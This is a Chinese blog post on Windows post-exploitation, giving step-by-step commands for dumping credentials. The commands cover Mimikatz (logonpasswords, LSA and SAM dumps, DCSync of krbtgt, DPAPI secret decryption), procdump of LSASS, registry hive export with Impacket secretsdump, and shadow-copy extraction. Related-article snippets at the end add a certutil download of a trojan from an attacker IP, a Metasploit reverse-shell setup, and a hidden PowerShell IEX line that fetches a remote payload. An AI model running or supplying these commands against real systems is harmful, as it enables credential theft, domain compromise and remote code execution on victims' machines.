后渗透

VSole2021-10-09 06:35:54

LSASS保护

LSASS 被配置为作为受保护进程 (PPL) 运行,您可以使用 PowerShell 进行查询。

Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL" 

如果是这种情况,您不能只是转储或解析 LSASS,您需要使用类似mimidrv.sys,PPLDump等

使用 Mimikatz 转储操作系统凭据

# Dump logon passwords
sekurlsa::logonpasswords

# Dump all domain hashes from a DC
## Note: Everything with /patch is noisy as heck since it writes to LSASS ?
lsadump::lsa /patch

# Dump only local users
lsadump::sam

# DCSync (requires 'ldap' SPN)
lsadump::dcsync /user:DOMAIN\krbtgt /domain:targetdomain.com

# Dump Windows secrets, such as stored creds for scheduled tasks (elevate first) ?
vault::list
vault::cred /patch

使用 Mimikatz 滥用数据保护 API (DPAPI)

Mimikatz 有相当多的功能可以访问 Windows 的 DPAPI,它用于加密许多凭据,例如浏览器密码。

需要注意的是Mimikatz会自动缓存主密钥,有高速缓存dpapi::cache,但是这确实不是如果没有Mimikatz会话持续工作(如钴攻击或使用时Invoke-Mimikatz)

# Find the IDs of protected secrets for a specific user
dir C:\Users\[USERNAME]\AppData\Local\Microsoft\Credentials

# Get information, including the used master key ID, from a specific secret (take the path from above)
dpapi::cred /in:C:\Users\[USERNAME]\AppData\Local\Microsoft\Credentials\1EF01CC92C17C670AC9E57B53C9134F3

# IF YOU ARE PRIVILEGED
# Dump all master keys from the current system
sekurlsa::dpapi

# IF YOU ARE NOT PRIVILEGED (session as target user required)
# Get the master key from the domain using RPC (the path contains the user SID, and then the ID of the masterkey identified in the previous step)
dpapi::masterkey /rpc /in:C:\Users\[USERNAME]\AppData\Roaming\Microsoft\Protect\S-1-5-21-3865823697-1816233505-1834004910-1124\dd89dddf-946b-4a80-9fd3-7f03ebd41ff4

# Decrypt the secret using the retrieved master key
# Alternatively, leave out /masterkey and add /unprotect to decrypt the secret using the cached master key (see above for caveats)
dpapi::cred /in:C:\Users\[USERNAME]]\AppData\Local\Microsoft\Credentials\1EF01CC92C17C670AC9E57B53C9134F3 /masterkey:91721d8b1ec[...]e0f02c3e44deece5f318ad

LSASS

运行Mimikatz的首选方式是在本地进行,并从目标机上转储LSASS内存的副本。Dumpert、Procdump或其他(自定义)工具可用于转储LSASS内存。

# Dump LSASS memory through a process snapshot (-r), avoiding interacting with it directly
.\procdump.exe -r -ma lsass.exe lsass.dmp

在我们的攻击系统上下载内存转储文件后,我们可以运行Mimikatz并切换到 "Minidump "模式,以解析该文件,如下所示。在此之后,我们可以像往常一样运行Mimikatz的凭证检索命令。

sekurlsa::minidump lsass.dmp

从注册表中转储

我们可以从注册表中转储机密并“离线”解析文件以获取系统列表。

reg.exe save hklm\sam c:\users\public\downloads\sam.save
reg.exe save hklm\system c:\users\public\downloads\system.save
reg.exe save hklm\security c:\users\public\downloads\security.save

然后在我们的攻击箱上,我们可以使用 Impacket 转储

impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL > secrets.out

从卷影副本Volume Shadow中转储

我们还可以创建SAM和SYSTEM文件的“卷影副本” (它们始终锁定在当前系统上)因此我们仍然可以将它们复制到我们的本地系统,为此需要提升提示。

wmic shadowcopy call create Volume='C:\'copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\users\public\sam.savecopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\users\public\system.save
systemmimikatz
本作品采用《CC 协议》,转载必须注明作者和本文链接
干货!!!
全在域环境中,用户信息存储在域控的ntds.dit(C:\Windows\NTDS\NTDS.dit)中; 非域环境也就是在工作组环境中,当前主机用户的密码信息存储着在sam文件(C:\Windows\System32\config\SAM)。 Windows操作系统通常使用两种方法(LM和NTLM)对用户的明文密码进行加密处理。 LM只能存储小于等于14个字符的密码hash 如果密码大于
过程Set-ExecutionPolicy Unrestricted -Scope CurrentUser //设置脚本策略Import-Module .\Invoke-PSimage.ps1 //导入脚本模块Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Out .\mimikatz.png -Image .\demo.jpg -Web. 开启一个目标可以访问的web服务,加载生成的mimikatz.png图片。修改 example.com改成自己的web服务地址。然后进行远程加载即可。
mimikatz的这个功能从本质上是解析Windows的数据库文件,从而获取其中存储的用户哈希。
后渗透
2021-10-09 06:35:54
如果是这种情况,您不能只是转储或解析 LSASS,您需要使用类似mimidrv.sys,PPLDump等 使用 Mimikatz 转储操作系统凭据
主要记录拿到Shell后再反弹MSF Shell、Mimikatz抓取密码以及登录域控等内网部分。前面漏洞环境搭建及打点等不作记录,可查看参考文章。攻击机利用Python开启HTTP服务$ python -m SimpleHTTPServer 8080. 靶机CMD下载木马文件$ certutil.exe -urlcache -split -f http://<攻击者IP>:8080/win.exe. [*] Started reverse TCP handler on <攻击者IP>:<攻击机监听端口>. 并且需要迁移到权限为NT AUTHORITY\SYSTEM的进程,因为进程迁移后meterpreter的权限是迁移进程的权限。查看靶机位数&进程meterpreter > sysinfo # 查看位数。配置路由meterpreter > run autoroute -s 192.168.52.0/24. MS17-010扫一下MS17-010meterpreter > background # 后台挂起Session
拿下一台运维机,上了个CS,发现曾经连接过几台服务器并且保存了凭据,网上查了圈发现CS不支持交互式mimikatz,记录下获取远程主机RDP凭据。
前言本篇介绍几款优秀的Windows上的密码抓取工具,每个工具都有自己的特点非常实用,欢迎补充。
powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://xx.xx.xx.xx:8888/logo.gif'))\"" /f
VSole
网络安全专家